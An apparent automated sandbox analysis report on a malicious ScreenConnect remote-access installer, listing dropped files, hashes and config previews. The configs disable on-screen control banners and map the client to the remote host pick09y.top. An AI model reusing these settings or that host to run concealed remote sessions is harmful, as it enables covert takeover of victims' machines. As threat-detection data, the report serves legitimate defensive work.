                                                                                                                                                                                                • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: support.Client.exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                                                                                                                                • Filename: ScreenConnect.ClientSetup (1).exe, Detection: malicious, Browse
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):81696
                                                                                                                                                                                                Entropy (8bit):5.862223562830496
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                                                                                                                                MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                                                                                                                                SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                                                                                                                                SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                                                                                                                                SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):548864
                                                                                                                                                                                                Entropy (8bit):6.031251664661689
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1721856
                                                                                                                                                                                                Entropy (8bit):6.639136400085158
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):601376
                                                                                                                                                                                                Entropy (8bit):6.185921191564225
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):197120
                                                                                                                                                                                                Entropy (8bit):6.58476728626163
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):652
                                                                                                                                                                                                Entropy (8bit):4.646296001566109
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
                                                                                                                                                                                                MD5:8B45555EF2300160892C25F453098AA4
                                                                                                                                                                                                SHA1:0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
                                                                                                                                                                                                SHA-256:75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
                                                                                                                                                                                                SHA-512:F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.F...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.t.....Support..Support.2Software is Updating.Do not turn off your computer.,Not enough data receiving from host computer..Removed
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):21018
                                                                                                                                                                                                Entropy (8bit):7.841465962209068
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
                                                                                                                                                                                                MD5:EF6DBD4F9C3BB57F1A2C4AF2847D8C54
                                                                                                                                                                                                SHA1:41D9329C5719467E8AE8777C2F38DE39F02F6AE4
                                                                                                                                                                                                SHA-256:0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
                                                                                                                                                                                                SHA-512:5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2..;..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..E..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.xO.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):50133
                                                                                                                                                                                                Entropy (8bit):4.759054454534641
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                                                                                                                                                                MD5:D524E8E6FD04B097F0401B2B668DB303
                                                                                                                                                                                                SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                                                                                                                                                                SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                                                                                                                                                                SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):26722
                                                                                                                                                                                                Entropy (8bit):7.7401940386372345
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                                                MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                                                SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                                                SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                                                SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):3343
                                                                                                                                                                                                Entropy (8bit):4.771733209240506
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                                                                                                                                                                MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                                                                                                                                                                SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                                                                                                                                                                SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                                                                                                                                                                SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):556
                                                                                                                                                                                                Entropy (8bit):5.0475081892433264
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO+L5D/vXbAa3xT:2dL9hK6E46YP07vH
                                                                                                                                                                                                MD5:E607EE31D56CA0747656CAAD9035710C
                                                                                                                                                                                                SHA1:5ABE4CD0836B40D174C891074B05AE252996439B
                                                                                                                                                                                                SHA-256:7ABAC0103AEA4F59C028F64CA0CD3A90A0C5AFBB840BAF12ECE4B68DEC0F100C
                                                                                                                                                                                                SHA-512:FEBEB6289E71EB67C5C6DFE03624692F3AFC7DA3B2217FF77DB70B253EC7F01D233B96B3DC4C354B6421AB9DC2AB20A91AA9D53A2737F7BF42C85DD83135A494
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>pick09y.top=62.182.85.100-07%2f11%2f2024%2016%3a56%3a34</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):556
                                                                                                                                                                                                Entropy (8bit):5.0475081892433264
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO+L5D/vXbAa3xT:2dL9hK6E46YP07vH
                                                                                                                                                                                                MD5:E607EE31D56CA0747656CAAD9035710C
                                                                                                                                                                                                SHA1:5ABE4CD0836B40D174C891074B05AE252996439B
                                                                                                                                                                                                SHA-256:7ABAC0103AEA4F59C028F64CA0CD3A90A0C5AFBB840BAF12ECE4B68DEC0F100C
                                                                                                                                                                                                SHA-512:FEBEB6289E71EB67C5C6DFE03624692F3AFC7DA3B2217FF77DB70B253EC7F01D233B96B3DC4C354B6421AB9DC2AB20A91AA9D53A2737F7BF42C85DD83135A494
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>pick09y.top=62.182.85.100-07%2f11%2f2024%2016%3a56%3a34</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):68096
                                                                                                                                                                                                Entropy (8bit):6.068776675019683
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1373
                                                                                                                                                                                                Entropy (8bit):5.369201792577388
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                Size (bytes):1662
                                                                                                                                                                                                Entropy (8bit):5.368796786510097
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
